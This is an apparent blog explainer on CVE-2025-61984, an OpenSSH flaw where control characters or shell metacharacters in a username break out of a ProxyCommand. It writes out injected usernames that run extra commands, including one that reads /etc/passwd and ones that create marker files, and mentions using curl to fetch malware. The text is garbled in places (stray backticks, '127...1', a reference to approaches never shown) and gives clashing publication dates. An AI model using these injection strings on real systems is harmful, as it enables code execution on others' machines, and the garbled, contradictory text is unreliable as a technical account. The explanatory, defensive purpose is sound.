CVE-2025-61984 - Exploiting OpenSSH Usernames with Control Characters for Code Execution via ProxyCommand

Published: June 2024
Severity: High
Affected: OpenSSH < 10.1
CVE: CVE-2025-61984 (MITRE)

What is CVE-2025-61984?

CVE-2025-61984 is a critical vulnerability found in OpenSSH versions before 10.1. It allows attackers to inject control characters into SSH usernames. If a ProxyCommand is used in the SSH configuration, these control characters can be exploited to execute arbitrary code on the client machine.

The SSH config uses ProxyCommand and passes the %u (username) token.

- The username value includes special control characters (like newlines or tabs) that break out of expected command structure.

Host *

ProxyCommand /bin/ssh-proxy %u

`

*The first two approaches are potentially dangerous if the username isn't trusted.*

If control characters are embedded in the username (e.g. newline \n, backticks, or shell metacharacters), and ProxyCommand isn't careful with quoting, it’s possible to "break out" of the intended command and add malicious code.

Suppose you have this in your ~/.ssh/config

Host badhost
    HostName target.example.com
    ProxyCommand proxy-helper %u %h %p

The ProxyCommand might execute a shell command

proxy-helper username hostname port

If an attacker can make you SSH with a username like

eviluser; cat /etc/passwd; #

or

eviluserid

Or with a control character like newline (\n) that splits the command, you end up running more than intended.

Malicious command line

ssh 'eviluser; touch /tmp/hacked;'@badhost

If ProxyCommand is not properly quoted, it gets expanded as

proxy-helper eviluser; touch /tmp/hacked; target.example.com 22

proxy-helper eviluser (first command)

- touch /tmp/hacked; target.example.com 22 (second command)

Attackers can do much worse, like running curl to download malware.

HostName 127...1

ProxyCommand /bin/echo %u

`bash

ssh 'user; echo "pwned" > ~/owned.txt; #'@exploit

`bash

/bin/echo user; echo "pwned" > ~/owned.txt; # 127...1 22

`

This will create a file ~/owned.txt with the text "pwned" in it.

If a real ProxyCommand script blindly passes the username to subprocesses or to sh -c, real code execution can happen.

Mitigation & Patch Status

- OpenSSH 10.1 and above: Patched. It now filters or escapes usernames from untrusted sources before expanding them into ProxyCommand.

Links & References

- OpenSSH Release Notes
- Seclists.org Full Disclosure Mailing List
- MITRE CVE Record
- Original OpenSSH Security Advisory

In Summary

CVE-2025-61984 is a real-world example of how small mistakes in input validation and command handling can open the door to serious security problems. If you’re using OpenSSH’s ProxyCommand and not controlling your usernames, your system may be at risk. Upgrade to OpenSSH 10.1 as soon as possible, and always be careful with any values that enter your ProxyCommand!

Stay safe, double-check your SSH config files, and keep your tools up to date!

Disclaimer: Provided information is for educational purposes only. Do not use this knowledge for unauthorized activities.

Timeline

Published on: 10/06/2025 19:15:36 UTC
Last modified on: 11/11/2025 15:15:36 UTC